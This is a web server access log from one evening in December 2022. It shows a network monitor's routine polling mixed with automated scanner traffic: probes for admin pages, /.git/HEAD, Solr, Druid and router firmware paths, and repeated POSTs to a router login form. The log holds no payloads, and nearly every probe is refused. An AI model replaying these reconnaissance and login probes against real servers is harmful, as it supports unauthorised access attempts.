212.91.246.72 - - [04/Dec/2022:22:22:55 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Dec/2022:22:23:55 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Dec/2022:22:24:55 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Dec/2022:22:25:55 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Dec/2022:22:26:55 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Dec/2022:22:27:55 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Dec/2022:22:28:55 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Dec/2022:22:29:55 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Dec/2022:22:30:55 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Dec/2022:22:31:55 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Dec/2022:22:32:55 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Dec/2022:22:33:55 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Dec/2022:22:34:55 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Dec/2022:22:35:55 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Dec/2022:22:36:55 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Dec/2022:22:37:55 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Dec/2022:22:38:55 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Dec/2022:22:39:55 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Dec/2022:22:40:55 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Dec/2022:22:41:55 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Dec/2022:22:42:55 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Dec/2022:22:43:55 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Dec/2022:22:44:55 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Dec/2022:22:45:55 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Dec/2022:22:46:55 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Dec/2022:22:47:55 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Dec/2022:22:48:55 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Dec/2022:22:49:55 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Dec/2022:22:50:55 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Dec/2022:22:51:55 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Dec/2022:22:52:55 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.180.143.140 - - [04/Dec/2022:22:53:50 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
212.91.246.72 - - [04/Dec/2022:22:53:55 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.180.143.140 - - [04/Dec/2022:22:54:05 +0100] "GET /webfig/ HTTP/1.1" 404 312 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
185.180.143.140 - - [04/Dec/2022:22:54:21 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
185.180.143.140 - - [04/Dec/2022:22:54:21 +0100] "GET /solr/ HTTP/1.1" 404 310 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
212.91.246.72 - - [04/Dec/2022:22:54:55 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Dec/2022:22:55:55 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Dec/2022:22:56:55 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Dec/2022:22:57:55 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Dec/2022:22:58:55 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
167.94.146.58 - - [04/Dec/2022:22:58:57 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
167.94.146.58 - - [04/Dec/2022:22:58:57 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.146.58 - - [04/Dec/2022:22:58:57 +0100] "PRI * HTTP/2.0" 400 329 "-" "-"
167.94.146.58 - - [04/Dec/2022:22:58:57 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
212.91.246.72 - - [04/Dec/2022:22:59:55 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Dec/2022:23:00:55 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Dec/2022:23:01:55 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Dec/2022:23:02:55 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
162.142.125.219 - - [04/Dec/2022:23:03:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
162.142.125.219 - - [04/Dec/2022:23:03:48 +0100] "PRI * HTTP/2.0" 400 329 "-" "-"
162.142.125.219 - - [04/Dec/2022:23:03:48 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
212.91.246.72 - - [04/Dec/2022:23:03:55 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
192.241.199.111 - - [04/Dec/2022:23:04:31 +0100] "GET /druid/index.html HTTP/1.1" 404 321 "-" "Mozilla/5.0 zgrab/0.x"
192.241.199.111 - - [04/Dec/2022:23:04:52 +0100] "GET /druid/index.html HTTP/1.1" 404 321 "-" "Mozilla/5.0 zgrab/0.x"
212.91.246.72 - - [04/Dec/2022:23:04:55 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
183.136.225.32 - - [04/Dec/2022:23:05:14 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0"
212.91.246.72 - - [04/Dec/2022:23:05:55 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
192.241.199.111 - - [04/Dec/2022:23:06:19 +0100] "GET /druid/index.html HTTP/1.1" 404 321 "-" "Mozilla/5.0 zgrab/0.x"
192.241.199.111 - - [04/Dec/2022:23:06:22 +0100] "GET /druid/index.html HTTP/1.1" 404 321 "-" "Mozilla/5.0 zgrab/0.x"
192.241.199.111 - - [04/Dec/2022:23:06:47 +0100] "GET /druid/index.html HTTP/1.1" 404 321 "-" "Mozilla/5.0 zgrab/0.x"
212.91.246.72 - - [04/Dec/2022:23:06:55 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
192.241.199.111 - - [04/Dec/2022:23:06:57 +0100] "GET /druid/index.html HTTP/1.1" 404 321 "-" "Mozilla/5.0 zgrab/0.x"
192.241.199.111 - - [04/Dec/2022:23:06:59 +0100] "GET /druid/index.html HTTP/1.1" 404 321 "-" "Mozilla/5.0 zgrab/0.x"
212.91.246.72 - - [04/Dec/2022:23:07:55 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
192.241.199.111 - - [04/Dec/2022:23:08:15 +0100] "GET /druid/index.html HTTP/1.1" 404 321 "-" "Mozilla/5.0 zgrab/0.x"
212.91.246.72 - - [04/Dec/2022:23:08:55 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Dec/2022:23:09:55 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Dec/2022:23:10:55 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
183.136.225.32 - - [04/Dec/2022:23:10:59 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE"
183.136.225.32 - - [04/Dec/2022:23:11:00 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE"
183.136.225.32 - - [04/Dec/2022:23:11:00 +0100] "GET /robots.txt HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE"
212.91.246.72 - - [04/Dec/2022:23:11:55 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Dec/2022:23:12:55 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
193.47.61.60 - - [04/Dec/2022:23:13:43 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [04/Dec/2022:23:13:55 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
80.82.78.39 - - [04/Dec/2022:23:14:41 +0100] "GET /login.php%20 HTTP/1.1" 404 314 "-" "Mozilla/5.0"
212.91.246.72 - - [04/Dec/2022:23:14:55 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Dec/2022:23:15:55 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
141.255.166.2 - - [04/Dec/2022:23:16:21 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.80:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
212.91.246.72 - - [04/Dec/2022:23:16:55 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Dec/2022:23:17:55 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Dec/2022:23:18:55 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
34.140.248.32 - - [04/Dec/2022:23:19:22 +0100] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.28.1"
34.76.158.233 - - [04/Dec/2022:23:19:34 +0100] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.28.1"
212.91.246.72 - - [04/Dec/2022:23:19:55 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Dec/2022:23:20:55 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Dec/2022:23:21:55 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Dec/2022:23:22:55 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
176.106.28.218 - - [04/Dec/2022:23:23:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
212.91.246.72 - - [04/Dec/2022:23:23:55 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Dec/2022:23:24:55 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Dec/2022:23:25:55 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
141.255.166.2 - - [04/Dec/2022:23:26:41 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.87:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
212.91.246.72 - - [04/Dec/2022:23:26:55 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Dec/2022:23:27:55 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Dec/2022:23:28:55 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
141.255.166.2 - - [04/Dec/2022:23:28:59 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.84:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
212.91.246.72 - - [04/Dec/2022:23:29:55 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Dec/2022:23:30:55 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
141.255.166.2 - - [04/Dec/2022:23:31:22 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.85:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
212.91.246.72 - - [04/Dec/2022:23:31:55 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
141.255.166.2 - - [04/Dec/2022:23:32:06 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.89:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
139.59.47.80 - - [04/Dec/2022:23:32:10 +0100] "\x16\x03\x01" 501 318 "-" "-"
139.59.47.80 - - [04/Dec/2022:23:32:11 +0100] "\x16\x03\x01" 501 318 "-" "-"
139.59.47.80 - - [04/Dec/2022:23:32:11 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
212.91.246.72 - - [04/Dec/2022:23:32:55 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
173.214.175.178 - - [04/Dec/2022:23:32:58 +0100] "CONNECT cloudflare.com:443 HTTP/1.1" 405 344 "-" "Go-http-client/1.1"
212.91.246.72 - - [04/Dec/2022:23:33:55 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
141.255.166.2 - - [04/Dec/2022:23:34:27 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.86:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
128.199.138.13 - - [04/Dec/2022:23:34:35 +0100] "\x16\x03\x01" 501 318 "-" "-"
128.199.138.13 - - [04/Dec/2022:23:34:35 +0100] "\x16\x03\x01" 501 318 "-" "-"
128.199.138.13 - - [04/Dec/2022:23:34:35 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
212.91.246.72 - - [04/Dec/2022:23:34:55 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
141.255.166.2 - - [04/Dec/2022:23:34:55 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.88:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
212.91.246.72 - - [04/Dec/2022:23:35:55 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Dec/2022:23:36:55 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
178.79.139.171 - - [04/Dec/2022:23:37:33 +0100] "GET / HTTP/1.0" 200 1229 "-" "-"
178.79.139.171 - - [04/Dec/2022:23:37:33 +0100] "POST /sdk HTTP/1.1" 404 308 "-" "curl/7.54.0"
178.79.139.171 - - [04/Dec/2022:23:37:33 +0100] "GET / HTTP/1.1" 200 1229 "-" "curl/7.54.0"
178.79.139.171 - - [04/Dec/2022:23:37:33 +0100] "GET /Portal/Portal.mwsl HTTP/1.1" 404 323 "-" "curl/7.54.0"
178.79.139.171 - - [04/Dec/2022:23:37:33 +0100] "POST /scripts/WPnBr.dll HTTP/1.1" 404 322 "-" "curl/7.54.0"
178.79.139.171 - - [04/Dec/2022:23:37:33 +0100] "GET / HTTP/1.0" 200 1229 "-" "-"
178.79.139.171 - - [04/Dec/2022:23:37:33 +0100] "GET /CSS/Miniweb.css HTTP/1.1" 404 320 "-" "curl/7.54.0"
178.79.139.171 - - [04/Dec/2022:23:37:33 +0100] "GET /SRJm HTTP/1.1" 404 309 "-" "curl/7.54.0"
178.79.139.171 - - [04/Dec/2022:23:37:33 +0100] "GET /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42 HTTP/1.1" 200 1229 "-" "curl/7.54.0"
178.79.139.171 - - [04/Dec/2022:23:37:34 +0100] "GET / HTTP/1.1" 200 1229 "-" "curl/7.54.0"
178-79-139-171.ip.linodeusercontent.com - - [04/Dec/2022:23:37:33 +0100] "GET /server-status HTTP/1.1" 403 322 "-" "curl/7.54.0"
178.79.139.171 - - [04/Dec/2022:23:37:34 +0100] "GET /docs/cplugError.html/ HTTP/1.1" 404 326 "-" "curl/7.54.0"
178.79.139.171 - - [04/Dec/2022:23:37:34 +0100] "GET /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000 HTTP/1.1" 200 1229 "-" "curl/7.54.0"
178.79.139.171 - - [04/Dec/2022:23:37:34 +0100] "GET /Portal0000.htm HTTP/1.1" 404 319 "-" "curl/7.54.0"
178.79.139.171 - - [04/Dec/2022:23:37:34 +0100] "HEAD / HTTP/1.1" 200 - "-" "curl/7.54.0"
178.79.139.171 - - [04/Dec/2022:23:37:34 +0100] "GET /__Additional HTTP/1.1" 404 317 "-" "curl/7.54.0"
178.79.139.171 - - [04/Dec/2022:23:37:34 +0100] "GET /nmaplowercheck1670193453 HTTP/1.1" 404 329 "-" "curl/7.54.0"
178.79.139.171 - - [04/Dec/2022:23:37:34 +0100] "GET / HTTP/1.1" 200 1229 "-" "curl/7.54.0"
178.79.139.171 - - [04/Dec/2022:23:37:34 +0100] "GET /pools/default/buckets HTTP/1.1" 404 326 "-" "curl/7.54.0"
178.79.139.171 - - [04/Dec/2022:23:37:34 +0100] "GET /start.jsa HTTP/1.1" 404 314 "-" "curl/7.54.0"
178.79.139.171 - - [04/Dec/2022:23:37:34 +0100] "GET /.git/HEAD HTTP/1.1" 404 314 "-" "curl/7.54.0"
178.79.139.171 - - [04/Dec/2022:23:37:34 +0100] "GET /HNAP1 HTTP/1.1" 404 310 "-" "curl/7.54.0"
178.79.139.171 - - [04/Dec/2022:23:37:34 +0100] "GET /pools HTTP/1.1" 404 310 "-" "curl/7.54.0"
178.79.139.171 - - [04/Dec/2022:23:37:34 +0100] "GET /start.html HTTP/1.1" 404 315 "-" "curl/7.54.0"
178.79.139.171 - - [04/Dec/2022:23:37:34 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "curl/7.54.0"
178.79.139.171 - - [04/Dec/2022:23:37:34 +0100] "GET / HTTP/1.1" 200 1229 "-" "curl/7.54.0"
178.79.139.171 - - [04/Dec/2022:23:37:34 +0100] "GET /menu.cgi HTTP/1.1" 404 313 "-" "curl/7.54.0"
178.79.139.171 - - [04/Dec/2022:23:37:35 +0100] "GET /admin.asp HTTP/1.1" 404 314 "-" "curl/7.54.0"
178.79.139.171 - - [04/Dec/2022:23:37:35 +0100] "GET /home.html HTTP/1.1" 404 314 "-" "curl/7.54.0"
178.79.139.171 - - [04/Dec/2022:23:37:35 +0100] "GET /menu.php HTTP/1.1" 404 313 "-" "curl/7.54.0"
178.79.139.171 - - [04/Dec/2022:23:37:35 +0100] "GET /index.html HTTP/1.1" 200 1229 "-" "curl/7.54.0"
178.79.139.171 - - [04/Dec/2022:23:37:35 +0100] "GET /inicio.jsp HTTP/1.1" 404 315 "-" "curl/7.54.0"
178.79.139.171 - - [04/Dec/2022:23:37:35 +0100] "GET /base.jsp HTTP/1.1" 404 313 "-" "curl/7.54.0"
178.79.139.171 - - [04/Dec/2022:23:37:35 +0100] "GET /base.cgi HTTP/1.1" 404 313 "-" "curl/7.54.0"
178.79.139.171 - - [04/Dec/2022:23:37:36 +0100] "GET /home.cgi HTTP/1.1" 404 313 "-" "curl/7.54.0"
178.79.139.171 - - [04/Dec/2022:23:37:36 +0100] "GET /main.jsp HTTP/1.1" 404 313 "-" "curl/7.54.0"
178.79.139.171 - - [04/Dec/2022:23:37:36 +0100] "GET /indice.php HTTP/1.1" 404 315 "-" "curl/7.54.0"
178.79.139.171 - - [04/Dec/2022:23:37:36 +0100] "GET /readme.txt HTTP/1.1" 404 315 "-" "curl/7.54.0"
178.79.139.171 - - [04/Dec/2022:23:37:36 +0100] "GET /indice.jsp HTTP/1.1" 404 315 "-" "curl/7.54.0"
178.79.139.171 - - [04/Dec/2022:23:37:36 +0100] "GET /robots.txt HTTP/1.1" 404 315 "-" "curl/7.54.0"
178.79.139.171 - - [04/Dec/2022:23:37:37 +0100] "GET /inicio.aspx HTTP/1.1" 404 316 "-" "curl/7.54.0"
178.79.139.171 - - [04/Dec/2022:23:37:37 +0100] "GET /admin.pl HTTP/1.1" 404 313 "-" "curl/7.54.0"
178.79.139.171 - - [04/Dec/2022:23:37:37 +0100] "GET /default.jhtml HTTP/1.1" 404 318 "-" "curl/7.54.0"
178.79.139.171 - - [04/Dec/2022:23:37:37 +0100] "GET /start.aspx HTTP/1.1" 404 315 "-" "curl/7.54.0"
178.79.139.171 - - [04/Dec/2022:23:37:37 +0100] "GET /admin.html HTTP/1.1" 404 315 "-" "curl/7.54.0"
178.79.139.171 - - [04/Dec/2022:23:37:37 +0100] "GET /home.pl HTTP/1.1" 404 312 "-" "curl/7.54.0"
178.79.139.171 - - [04/Dec/2022:23:37:37 +0100] "GET /admin.jsp HTTP/1.1" 404 314 "-" "curl/7.54.0"
178.79.139.171 - - [04/Dec/2022:23:37:38 +0100] "GET /default.php HTTP/1.1" 404 316 "-" "curl/7.54.0"
178.79.139.171 - - [04/Dec/2022:23:37:38 +0100] "GET /inicio.html HTTP/1.1" 404 316 "-" "curl/7.54.0"
178.79.139.171 - - [04/Dec/2022:23:37:38 +0100] "GET /admin.jsa HTTP/1.1" 404 314 "-" "curl/7.54.0"
178.79.139.171 - - [04/Dec/2022:23:37:38 +0100] "GET /start.jsp HTTP/1.1" 404 314 "-" "curl/7.54.0"
178.79.139.171 - - [04/Dec/2022:23:37:38 +0100] "GET /admin.jhtml HTTP/1.1" 404 316 "-" "curl/7.54.0"
178.79.139.171 - - [04/Dec/2022:23:37:38 +0100] "GET /admin.php HTTP/1.1" 404 314 "-" "curl/7.54.0"
178.79.139.171 - - [04/Dec/2022:23:37:39 +0100] "GET /admin.cgi HTTP/1.1" 404 314 "-" "curl/7.54.0"
178.79.139.171 - - [04/Dec/2022:23:37:39 +0100] "GET /menu.jsa HTTP/1.1" 404 313 "-" "curl/7.54.0"
178.79.139.171 - - [04/Dec/2022:23:37:39 +0100] "GET /default.aspx HTTP/1.1" 404 317 "-" "curl/7.54.0"
178.79.139.171 - - [04/Dec/2022:23:37:39 +0100] "GET /admin.cfm HTTP/1.1" 404 314 "-" "curl/7.54.0"
178.79.139.171 - - [04/Dec/2022:23:37:39 +0100] "GET /start.cgi HTTP/1.1" 404 314 "-" "curl/7.54.0"
178.79.139.171 - - [04/Dec/2022:23:37:39 +0100] "GET /start.pl HTTP/1.1" 404 313 "-" "curl/7.54.0"
